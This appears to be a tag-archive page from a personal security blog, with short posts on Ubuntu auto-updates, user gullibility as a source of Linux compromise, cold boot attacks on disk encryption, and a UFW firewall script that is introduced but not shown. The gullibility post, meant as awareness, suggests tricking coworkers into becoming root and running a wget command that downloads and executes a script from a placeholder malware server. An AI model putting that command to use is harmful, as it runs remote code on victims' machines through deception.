Tag Archives: security

Auto update for Debian/Ubuntu

I use the following script to automatically update my Ubuntu box.
I don’t recommend using this on your production servers!

Note that there are some dangers regarding automatic updates. You can read more about it here.

How to write a linux virus

After reading an interesting article about Linux “viruses” (the comments are interesting, too), I decided to raise the alarm about the source of many security-related issues in today’s computers: the user.
The author talks about the many ways to compromise a Linux box, even if you are not root.
I will not get into technical methods; you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t believe me? Make a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– ask them to open a terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -O /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Consider that every one of us knows a person like that.
It’s not hard to make a user click on a link or run a command.
The attackers just have to find ways to extract information from the compromised box.
At the end of the article, the author talks about solutions to this problem.

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.

In conclusion, there are no bullet-proof systems, only users who are too careless and click every link that crosses their mouse’s path.

Cold Boot Attacks on Encryption Keys

Some guys at Princeton University published the results of their attacks on popular disk encryption systems (BitLocker, FileVault, dm-crypt, and TrueCrypt) using no special devices or materials.
Find out more about their research here and here.

Sample firewall script for Ubuntu

I just thought that you might be interested in a small script you can use in Hardy Heron.

It uses the new UFW (Uncomplicated Firewall) introduced in this new Ubuntu release.

The script is well commented, so everything is easy to understand.

Here is the script:

You can modify it by adding/removing rules accordingly.